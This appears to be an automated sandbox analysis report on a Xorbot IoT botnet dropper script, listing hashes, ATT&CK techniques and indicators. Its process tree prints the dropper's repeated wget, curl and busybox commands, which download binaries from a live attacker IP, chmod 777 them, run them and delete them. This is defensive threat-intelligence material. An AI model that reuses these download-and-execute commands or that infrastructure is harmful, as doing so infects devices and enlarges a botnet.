xorbot | 3404137c0765d015c748fae94b035e9e728e78ac85c9ea81992ba3a0dce96f35

Analysis

max time kernel
142s
max time network
151s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
11/12/2024, 16:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

ebc0c82c0e23fd014e8f04fd87507349
SHA1

766664536fa298899ab7e3d6d792d614e1c11d0c
SHA256

3404137c0765d015c748fae94b035e9e728e78ac85c9ea81992ba3a0dce96f35
SHA512

82f98c0f995649ed1bec121d570ae17ad195379595ca4583fb900c23c64a7f773b561c2f35b6462022c40bb3e392cdf20706bb4a9c798e95fd072ab1a8e0f239
SSDEEP

96:uPP63Z+kcgN6lTDXIPnsozMLMP65N9PP63bZ+kcgN8lvHDXIPnlvBk5mqL6P85NU:5+kcg47AMAP65nkcgXWo9

Score

10^/10

xorbot botnet defense_evasion discovery trojan

Malware Config

Signatures

Detects Xorbot 1 IoCs

botnet trojan

resource	yara_rule
behavioral3/files/fstream-1.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot

File and Directory Permissions Modification 1 TTPs 24 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
759	chmod
879	chmod
927	chmod
951	chmod
857	chmod
897	chmod
933	chmod
957	chmod
744	chmod
753	chmod
776	chmod
837	chmod
891	chmod
921	chmod
939	chmod
945	chmod
963	chmod
797	chmod
821	chmod
831	chmod
885	chmod
903	chmod
909	chmod
915	chmod

Executes dropped EXE 24 IoCs

Reads runtime system information 24 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 10 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
745	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
748	rm
936	wget
938	busybox
941	rm
720	wget
728	curl
740	busybox
937	curl
940	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74

Writes file to tmp directory 26 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V	curl
File opened for modification	/tmp/MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ	curl
File opened for modification	/tmp/jfh5QMoKv9GoFsHjBmvNtTjb62VmZAqUzi	curl
File opened for modification	/tmp/VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V	curl
File opened for modification	/tmp/UFK1aCixdf3UXYbkGRVrbde4PB5uIIoYvO	curl
File opened for modification	/tmp/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74	wget
File opened for modification	/tmp/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74	curl
File opened for modification	/tmp/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74	busybox
File opened for modification	/tmp/ZpOEGXN1E4YCv82tKGkll6qbQ55jlJ7EjS	curl
File opened for modification	/tmp/RabDggy8GKKnLq1X0GFKabwNiKJCoupOXX	curl
File opened for modification	/tmp/MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ	curl
File opened for modification	/tmp/QawHGfNDrQs7XudNgwWeAeB79KQMkYNnhp	curl
File opened for modification	/tmp/vE65LHPHPMX5cIeLQhMj2wvpVb1TliD9F0	curl
File opened for modification	/tmp/VAny7AriniG4jyy7II43Ri0DQ1d0whOQs5	curl
File opened for modification	/tmp/4LWt5NF1vFsWBm5H1a9V9Koy1DYBNJzq32	curl
File opened for modification	/tmp/UFK1aCixdf3UXYbkGRVrbde4PB5uIIoYvO	curl
File opened for modification	/tmp/9EhhHIjAB1gyIwGkRIniBTLx7xvyQCG8nk	curl
File opened for modification	/tmp/N7xXGTYypnkkTR9pohUEu4pnFaXerg6hHn	curl
File opened for modification	/tmp/wqnlxt6Oyi1S4Zu1rse3ElV3dUUXiDjIDL	curl
File opened for modification	/tmp/4LWt5NF1vFsWBm5H1a9V9Koy1DYBNJzq32	curl
File opened for modification	/tmp/QawHGfNDrQs7XudNgwWeAeB79KQMkYNnhp	curl
File opened for modification	/tmp/vE65LHPHPMX5cIeLQhMj2wvpVb1TliD9F0	curl
File opened for modification	/tmp/VAny7AriniG4jyy7II43Ri0DQ1d0whOQs5	curl
File opened for modification	/tmp/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74	curl
File opened for modification	/tmp/ZpOEGXN1E4YCv82tKGkll6qbQ55jlJ7EjS	curl
File opened for modification	/tmp/RabDggy8GKKnLq1X0GFKabwNiKJCoupOXX	curl

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:715
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:717
- /usr/bin/wget
  wget http://37.44.238.68/bins/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:720
- /usr/bin/curl
  curl -O http://37.44.238.68/bins/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:728
- /bin/busybox
  /bin/busybox wget http://37.44.238.68/bins/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:740
- /bin/chmod
  chmod 777 pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  2⤵
  - File and Directory Permissions Modification
  PID:744
- /tmp/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  ./pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:745
- /bin/rm
  rm pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  2⤵
  - System Network Configuration Discovery
  PID:748
- /usr/bin/wget
  wget http://37.44.238.68/bins/VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V
  2⤵
  PID:749
- /usr/bin/curl
  curl -O http://37.44.238.68/bins/VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:751
- /bin/busybox
  /bin/busybox wget http://37.44.238.68/bins/VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V
  2⤵
  PID:752
- /bin/chmod
  chmod 777 VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V
  2⤵
  - File and Directory Permissions Modification
  PID:753
- /tmp/VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V
  ./VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V
  2⤵
  - Executes dropped EXE
  PID:754
- /bin/rm
  rm VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V
  2⤵
  PID:755
- /usr/bin/wget
  wget http://37.44.238.68/bins/MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ
  2⤵
  PID:756
- /usr/bin/curl
  curl -O http://37.44.238.68/bins/MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:757
- /bin/busybox
  /bin/busybox wget http://37.44.238.68/bins/MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ
  2⤵
  PID:758
- /bin/chmod
  chmod 777 MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ
  2⤵
  - File and Directory Permissions Modification
  PID:759
- /tmp/MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ
  ./MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ
  2⤵
  - Executes dropped EXE
  PID:760
- /bin/rm
  rm MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ
  2⤵
  PID:761
- /usr/bin/wget
  wget http://37.44.238.68/bins/QawHGfNDrQs7XudNgwWeAeB79KQMkYNnhp
  2⤵
  PID:762
- /usr/bin/curl
  curl -O http://37.44.238.68/bins/QawHGfNDrQs7XudNgwWeAeB79KQMkYNnhp
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:763
- /bin/busybox
  /bin/busybox wget http://37.44.238.68/bins/QawHGfNDrQs7XudNgwWeAeB79KQMkYNnhp
  2⤵
  PID:773
- /bin/chmod
  chmod 777 QawHGfNDrQs7XudNgwWeAeB79KQMkYNnhp
  2⤵
  - File and Directory Permissions Modification
  PID:776
- /tmp/QawHGfNDrQs7XudNgwWeAeB79KQMkYNnhp
  ./QawHGfNDrQs7XudNgwWeAeB79KQMkYNnhp
  2⤵
  - Executes dropped EXE
  PID:777
- /bin/rm
  rm QawHGfNDrQs7XudNgwWeAeB79KQMkYNnhp
  2⤵
  PID:780
- /usr/bin/wget
  wget http://37.44.238.68/bins/VAny7AriniG4jyy7II43Ri0DQ1d0whOQs5
  2⤵
  PID:781
- /usr/bin/curl
  curl -O http://37.44.238.68/bins/VAny7AriniG4jyy7II43Ri0DQ1d0whOQs5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:786
- /bin/busybox
  /bin/busybox wget http://37.44.238.68/bins/VAny7AriniG4jyy7II43Ri0DQ1d0whOQs5
  2⤵
  PID:794
- /bin/chmod
  chmod 777 VAny7AriniG4jyy7II43Ri0DQ1d0whOQs5
  2⤵
  - File and Directory Permissions Modification
  PID:797
- /tmp/VAny7AriniG4jyy7II43Ri0DQ1d0whOQs5
  ./VAny7AriniG4jyy7II43Ri0DQ1d0whOQs5
  2⤵
  - Executes dropped EXE
  PID:798
- /bin/rm
  rm VAny7AriniG4jyy7II43Ri0DQ1d0whOQs5
  2⤵
  PID:801
- /usr/bin/wget
  wget http://37.44.238.68/bins/4LWt5NF1vFsWBm5H1a9V9Koy1DYBNJzq32
  2⤵
  PID:803
- /usr/bin/curl
  curl -O http://37.44.238.68/bins/4LWt5NF1vFsWBm5H1a9V9Koy1DYBNJzq32
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:806
- /bin/busybox
  /bin/busybox wget http://37.44.238.68/bins/4LWt5NF1vFsWBm5H1a9V9Koy1DYBNJzq32
  2⤵
  PID:819
- /bin/chmod
  chmod 777 4LWt5NF1vFsWBm5H1a9V9Koy1DYBNJzq32
  2⤵
  - File and Directory Permissions Modification
  PID:821
- /tmp/4LWt5NF1vFsWBm5H1a9V9Koy1DYBNJzq32
  ./4LWt5NF1vFsWBm5H1a9V9Koy1DYBNJzq32
  2⤵
  - Executes dropped EXE
  PID:823
- /bin/rm
  rm 4LWt5NF1vFsWBm5H1a9V9Koy1DYBNJzq32
  2⤵
  PID:826
- /usr/bin/wget
  wget http://37.44.238.68/bins/UFK1aCixdf3UXYbkGRVrbde4PB5uIIoYvO
  2⤵
  PID:827
- /usr/bin/curl
  curl -O http://37.44.238.68/bins/UFK1aCixdf3UXYbkGRVrbde4PB5uIIoYvO
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:829
- /bin/busybox
  /bin/busybox wget http://37.44.238.68/bins/UFK1aCixdf3UXYbkGRVrbde4PB5uIIoYvO
  2⤵
  PID:830
- /bin/chmod
  chmod 777 UFK1aCixdf3UXYbkGRVrbde4PB5uIIoYvO
  2⤵
  - File and Directory Permissions Modification
  PID:831
- /tmp/UFK1aCixdf3UXYbkGRVrbde4PB5uIIoYvO
  ./UFK1aCixdf3UXYbkGRVrbde4PB5uIIoYvO
  2⤵
  - Executes dropped EXE
  PID:832
- /bin/rm
  rm UFK1aCixdf3UXYbkGRVrbde4PB5uIIoYvO
  2⤵
  PID:833
- /usr/bin/wget
  wget http://37.44.238.68/bins/vE65LHPHPMX5cIeLQhMj2wvpVb1TliD9F0
  2⤵
  PID:834
- /usr/bin/curl
  curl -O http://37.44.238.68/bins/vE65LHPHPMX5cIeLQhMj2wvpVb1TliD9F0
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:835
- /bin/busybox
  /bin/busybox wget http://37.44.238.68/bins/vE65LHPHPMX5cIeLQhMj2wvpVb1TliD9F0
  2⤵
  PID:836
- /bin/chmod
  chmod 777 vE65LHPHPMX5cIeLQhMj2wvpVb1TliD9F0
  2⤵
  - File and Directory Permissions Modification
  PID:837
- /tmp/vE65LHPHPMX5cIeLQhMj2wvpVb1TliD9F0
  ./vE65LHPHPMX5cIeLQhMj2wvpVb1TliD9F0
  2⤵
  - Executes dropped EXE
  PID:838
- /bin/rm
  rm vE65LHPHPMX5cIeLQhMj2wvpVb1TliD9F0
  2⤵
  PID:839
- /usr/bin/wget
  wget http://37.44.238.68/bins/ZpOEGXN1E4YCv82tKGkll6qbQ55jlJ7EjS
  2⤵
  PID:840
- /usr/bin/curl
  curl -O http://37.44.238.68/bins/ZpOEGXN1E4YCv82tKGkll6qbQ55jlJ7EjS
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:841
- /bin/busybox
  /bin/busybox wget http://37.44.238.68/bins/ZpOEGXN1E4YCv82tKGkll6qbQ55jlJ7EjS
  2⤵
  PID:845
- /bin/chmod
  chmod 777 ZpOEGXN1E4YCv82tKGkll6qbQ55jlJ7EjS
  2⤵
  - File and Directory Permissions Modification
  PID:857
- /tmp/ZpOEGXN1E4YCv82tKGkll6qbQ55jlJ7EjS
  ./ZpOEGXN1E4YCv82tKGkll6qbQ55jlJ7EjS
  2⤵
  - Executes dropped EXE
  PID:858
- /bin/rm
  rm ZpOEGXN1E4YCv82tKGkll6qbQ55jlJ7EjS
  2⤵
  PID:861
- /usr/bin/wget
  wget http://37.44.238.68/bins/RabDggy8GKKnLq1X0GFKabwNiKJCoupOXX
  2⤵
  PID:863
- /usr/bin/curl
  curl -O http://37.44.238.68/bins/RabDggy8GKKnLq1X0GFKabwNiKJCoupOXX
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:868
- /bin/busybox
  /bin/busybox wget http://37.44.238.68/bins/RabDggy8GKKnLq1X0GFKabwNiKJCoupOXX
  2⤵
  PID:878
- /bin/chmod
  chmod 777 RabDggy8GKKnLq1X0GFKabwNiKJCoupOXX
  2⤵
  - File and Directory Permissions Modification
  PID:879
- /tmp/RabDggy8GKKnLq1X0GFKabwNiKJCoupOXX
  ./RabDggy8GKKnLq1X0GFKabwNiKJCoupOXX
  2⤵
  - Executes dropped EXE
  PID:880
- /bin/rm
  rm RabDggy8GKKnLq1X0GFKabwNiKJCoupOXX
  2⤵
  PID:881
- /usr/bin/wget
  wget http://37.44.238.68/bins/9EhhHIjAB1gyIwGkRIniBTLx7xvyQCG8nk
  2⤵
  PID:882
- /usr/bin/curl
  curl -O http://37.44.238.68/bins/9EhhHIjAB1gyIwGkRIniBTLx7xvyQCG8nk
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:883
- /bin/busybox
  /bin/busybox wget http://37.44.238.68/bins/9EhhHIjAB1gyIwGkRIniBTLx7xvyQCG8nk
  2⤵
  PID:884
- /bin/chmod
  chmod 777 9EhhHIjAB1gyIwGkRIniBTLx7xvyQCG8nk
  2⤵
  - File and Directory Permissions Modification
  PID:885
- /tmp/9EhhHIjAB1gyIwGkRIniBTLx7xvyQCG8nk
  ./9EhhHIjAB1gyIwGkRIniBTLx7xvyQCG8nk
  2⤵
  - Executes dropped EXE
  PID:886
- /bin/rm
  rm 9EhhHIjAB1gyIwGkRIniBTLx7xvyQCG8nk
  2⤵
  PID:887
- /usr/bin/wget
  wget http://37.44.238.68/bins/jfh5QMoKv9GoFsHjBmvNtTjb62VmZAqUzi
  2⤵
  PID:888
- /usr/bin/curl
  curl -O http://37.44.238.68/bins/jfh5QMoKv9GoFsHjBmvNtTjb62VmZAqUzi
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:889
- /bin/busybox
  /bin/busybox wget http://37.44.238.68/bins/jfh5QMoKv9GoFsHjBmvNtTjb62VmZAqUzi
  2⤵
  PID:890
- /bin/chmod
  chmod 777 jfh5QMoKv9GoFsHjBmvNtTjb62VmZAqUzi
  2⤵
  - File and Directory Permissions Modification
  PID:891
- /tmp/jfh5QMoKv9GoFsHjBmvNtTjb62VmZAqUzi
  ./jfh5QMoKv9GoFsHjBmvNtTjb62VmZAqUzi
  2⤵
  - Executes dropped EXE
  PID:892
- /bin/rm
  rm jfh5QMoKv9GoFsHjBmvNtTjb62VmZAqUzi
  2⤵
  PID:893
- /usr/bin/wget
  wget http://37.44.238.68/bins/N7xXGTYypnkkTR9pohUEu4pnFaXerg6hHn
  2⤵
  PID:894
- /usr/bin/curl
  curl -O http://37.44.238.68/bins/N7xXGTYypnkkTR9pohUEu4pnFaXerg6hHn
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:895
- /bin/busybox
  /bin/busybox wget http://37.44.238.68/bins/N7xXGTYypnkkTR9pohUEu4pnFaXerg6hHn
  2⤵
  PID:896
- /bin/chmod
  chmod 777 N7xXGTYypnkkTR9pohUEu4pnFaXerg6hHn
  2⤵
  - File and Directory Permissions Modification
  PID:897
- /tmp/N7xXGTYypnkkTR9pohUEu4pnFaXerg6hHn
  ./N7xXGTYypnkkTR9pohUEu4pnFaXerg6hHn
  2⤵
  - Executes dropped EXE
  PID:898
- /bin/rm
  rm N7xXGTYypnkkTR9pohUEu4pnFaXerg6hHn
  2⤵
  PID:899
- /usr/bin/wget
  wget http://37.44.238.68/bins/wqnlxt6Oyi1S4Zu1rse3ElV3dUUXiDjIDL
  2⤵
  PID:900
- /usr/bin/curl
  curl -O http://37.44.238.68/bins/wqnlxt6Oyi1S4Zu1rse3ElV3dUUXiDjIDL
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:901
- /bin/busybox
  /bin/busybox wget http://37.44.238.68/bins/wqnlxt6Oyi1S4Zu1rse3ElV3dUUXiDjIDL
  2⤵
  PID:902
- /bin/chmod
  chmod 777 wqnlxt6Oyi1S4Zu1rse3ElV3dUUXiDjIDL
  2⤵
  - File and Directory Permissions Modification
  PID:903
- /tmp/wqnlxt6Oyi1S4Zu1rse3ElV3dUUXiDjIDL
  ./wqnlxt6Oyi1S4Zu1rse3ElV3dUUXiDjIDL
  2⤵
  - Executes dropped EXE
  PID:904
- /bin/rm
  rm wqnlxt6Oyi1S4Zu1rse3ElV3dUUXiDjIDL
  2⤵
  PID:905
- /usr/bin/wget
  wget http://37.44.238.68/bins/VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V
  2⤵
  PID:906
- /usr/bin/curl
  curl -O http://37.44.238.68/bins/VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:907
- /bin/busybox
  /bin/busybox wget http://37.44.238.68/bins/VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V
  2⤵
  PID:908
- /bin/chmod
  chmod 777 VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V
  2⤵
  - File and Directory Permissions Modification
  PID:909
- /tmp/VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V
  ./VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V
  2⤵
  - Executes dropped EXE
  PID:910
- /bin/rm
  rm VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V
  2⤵
  PID:911
- /usr/bin/wget
  wget http://37.44.238.68/bins/MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ
  2⤵
  PID:912
- /usr/bin/curl
  curl -O http://37.44.238.68/bins/MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:913
- /bin/busybox
  /bin/busybox wget http://37.44.238.68/bins/MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ
  2⤵
  PID:914
- /bin/chmod
  chmod 777 MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ
  2⤵
  - File and Directory Permissions Modification
  PID:915
- /tmp/MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ
  ./MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ
  2⤵
  - Executes dropped EXE
  PID:916
- /bin/rm
  rm MF43ZiGhmBLYpBbG6wFc7vH5q77xmFK6FZ
  2⤵
  PID:917
- /usr/bin/wget
  wget http://37.44.238.68/bins/QawHGfNDrQs7XudNgwWeAeB79KQMkYNnhp
  2⤵
  PID:918
- /usr/bin/curl
  curl -O http://37.44.238.68/bins/QawHGfNDrQs7XudNgwWeAeB79KQMkYNnhp
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:919
- /bin/busybox
  /bin/busybox wget http://37.44.238.68/bins/QawHGfNDrQs7XudNgwWeAeB79KQMkYNnhp
  2⤵
  PID:920
- /bin/chmod
  chmod 777 QawHGfNDrQs7XudNgwWeAeB79KQMkYNnhp
  2⤵
  - File and Directory Permissions Modification
  PID:921
- /tmp/QawHGfNDrQs7XudNgwWeAeB79KQMkYNnhp
  ./QawHGfNDrQs7XudNgwWeAeB79KQMkYNnhp
  2⤵
  - Executes dropped EXE
  PID:922
- /bin/rm
  rm QawHGfNDrQs7XudNgwWeAeB79KQMkYNnhp
  2⤵
  PID:923
- /usr/bin/wget
  wget http://37.44.238.68/bins/VAny7AriniG4jyy7II43Ri0DQ1d0whOQs5
  2⤵
  PID:924
- /usr/bin/curl
  curl -O http://37.44.238.68/bins/VAny7AriniG4jyy7II43Ri0DQ1d0whOQs5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:925
- /bin/busybox
  /bin/busybox wget http://37.44.238.68/bins/VAny7AriniG4jyy7II43Ri0DQ1d0whOQs5
  2⤵
  PID:926
- /bin/chmod
  chmod 777 VAny7AriniG4jyy7II43Ri0DQ1d0whOQs5
  2⤵
  - File and Directory Permissions Modification
  PID:927
- /tmp/VAny7AriniG4jyy7II43Ri0DQ1d0whOQs5
  ./VAny7AriniG4jyy7II43Ri0DQ1d0whOQs5
  2⤵
  - Executes dropped EXE
  PID:928
- /bin/rm
  rm VAny7AriniG4jyy7II43Ri0DQ1d0whOQs5
  2⤵
  PID:929
- /usr/bin/wget
  wget http://37.44.238.68/bins/4LWt5NF1vFsWBm5H1a9V9Koy1DYBNJzq32
  2⤵
  PID:930
- /usr/bin/curl
  curl -O http://37.44.238.68/bins/4LWt5NF1vFsWBm5H1a9V9Koy1DYBNJzq32
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:931
- /bin/busybox
  /bin/busybox wget http://37.44.238.68/bins/4LWt5NF1vFsWBm5H1a9V9Koy1DYBNJzq32
  2⤵
  PID:932
- /bin/chmod
  chmod 777 4LWt5NF1vFsWBm5H1a9V9Koy1DYBNJzq32
  2⤵
  - File and Directory Permissions Modification
  PID:933
- /tmp/4LWt5NF1vFsWBm5H1a9V9Koy1DYBNJzq32
  ./4LWt5NF1vFsWBm5H1a9V9Koy1DYBNJzq32
  2⤵
  - Executes dropped EXE
  PID:934
- /bin/rm
  rm 4LWt5NF1vFsWBm5H1a9V9Koy1DYBNJzq32
  2⤵
  PID:935
- /usr/bin/wget
  wget http://37.44.238.68/bins/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  2⤵
  - System Network Configuration Discovery
  PID:936
- /usr/bin/curl
  curl -O http://37.44.238.68/bins/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:937
- /bin/busybox
  /bin/busybox wget http://37.44.238.68/bins/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  2⤵
  - System Network Configuration Discovery
  PID:938
- /bin/chmod
  chmod 777 pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  2⤵
  - File and Directory Permissions Modification
  PID:939
- /tmp/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  ./pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:940
- /bin/rm
  rm pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  2⤵
  - System Network Configuration Discovery
  PID:941
- /usr/bin/wget
  wget http://37.44.238.68/bins/vE65LHPHPMX5cIeLQhMj2wvpVb1TliD9F0
  2⤵
  PID:942
- /usr/bin/curl
  curl -O http://37.44.238.68/bins/vE65LHPHPMX5cIeLQhMj2wvpVb1TliD9F0
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:943
- /bin/busybox
  /bin/busybox wget http://37.44.238.68/bins/vE65LHPHPMX5cIeLQhMj2wvpVb1TliD9F0
  2⤵
  PID:944
- /bin/chmod
  chmod 777 vE65LHPHPMX5cIeLQhMj2wvpVb1TliD9F0
  2⤵
  - File and Directory Permissions Modification
  PID:945
- /tmp/vE65LHPHPMX5cIeLQhMj2wvpVb1TliD9F0
  ./vE65LHPHPMX5cIeLQhMj2wvpVb1TliD9F0
  2⤵
  - Executes dropped EXE
  PID:946
- /bin/rm
  rm vE65LHPHPMX5cIeLQhMj2wvpVb1TliD9F0
  2⤵
  PID:947
- /usr/bin/wget
  wget http://37.44.238.68/bins/ZpOEGXN1E4YCv82tKGkll6qbQ55jlJ7EjS
  2⤵
  PID:948
- /usr/bin/curl
  curl -O http://37.44.238.68/bins/ZpOEGXN1E4YCv82tKGkll6qbQ55jlJ7EjS
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:949
- /bin/busybox
  /bin/busybox wget http://37.44.238.68/bins/ZpOEGXN1E4YCv82tKGkll6qbQ55jlJ7EjS
  2⤵
  PID:950
- /bin/chmod
  chmod 777 ZpOEGXN1E4YCv82tKGkll6qbQ55jlJ7EjS
  2⤵
  - File and Directory Permissions Modification
  PID:951
- /tmp/ZpOEGXN1E4YCv82tKGkll6qbQ55jlJ7EjS
  ./ZpOEGXN1E4YCv82tKGkll6qbQ55jlJ7EjS
  2⤵
  - Executes dropped EXE
  PID:952
- /bin/rm
  rm ZpOEGXN1E4YCv82tKGkll6qbQ55jlJ7EjS
  2⤵
  PID:953
- /usr/bin/wget
  wget http://37.44.238.68/bins/UFK1aCixdf3UXYbkGRVrbde4PB5uIIoYvO
  2⤵
  PID:954
- /usr/bin/curl
  curl -O http://37.44.238.68/bins/UFK1aCixdf3UXYbkGRVrbde4PB5uIIoYvO
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:955
- /bin/busybox
  /bin/busybox wget http://37.44.238.68/bins/UFK1aCixdf3UXYbkGRVrbde4PB5uIIoYvO
  2⤵
  PID:956
- /bin/chmod
  chmod 777 UFK1aCixdf3UXYbkGRVrbde4PB5uIIoYvO
  2⤵
  - File and Directory Permissions Modification
  PID:957
- /tmp/UFK1aCixdf3UXYbkGRVrbde4PB5uIIoYvO
  ./UFK1aCixdf3UXYbkGRVrbde4PB5uIIoYvO
  2⤵
  - Executes dropped EXE
  PID:958
- /bin/rm
  rm UFK1aCixdf3UXYbkGRVrbde4PB5uIIoYvO
  2⤵
  PID:959
- /usr/bin/wget
  wget http://37.44.238.68/bins/RabDggy8GKKnLq1X0GFKabwNiKJCoupOXX
  2⤵
  PID:960
- /usr/bin/curl
  curl -O http://37.44.238.68/bins/RabDggy8GKKnLq1X0GFKabwNiKJCoupOXX
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:961
- /bin/busybox
  /bin/busybox wget http://37.44.238.68/bins/RabDggy8GKKnLq1X0GFKabwNiKJCoupOXX
  2⤵
  PID:962
- /bin/chmod
  chmod 777 RabDggy8GKKnLq1X0GFKabwNiKJCoupOXX
  2⤵
  - File and Directory Permissions Modification
  PID:963
- /tmp/RabDggy8GKKnLq1X0GFKabwNiKJCoupOXX
  ./RabDggy8GKKnLq1X0GFKabwNiKJCoupOXX
  2⤵
  - Executes dropped EXE
  PID:964
- /bin/rm
  rm RabDggy8GKKnLq1X0GFKabwNiKJCoupOXX
  2⤵
  PID:965
- /usr/bin/wget
  wget http://37.44.238.68/bins/jfh5QMoKv9GoFsHjBmvNtTjb62VmZAqUzi
  2⤵
  PID:966

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

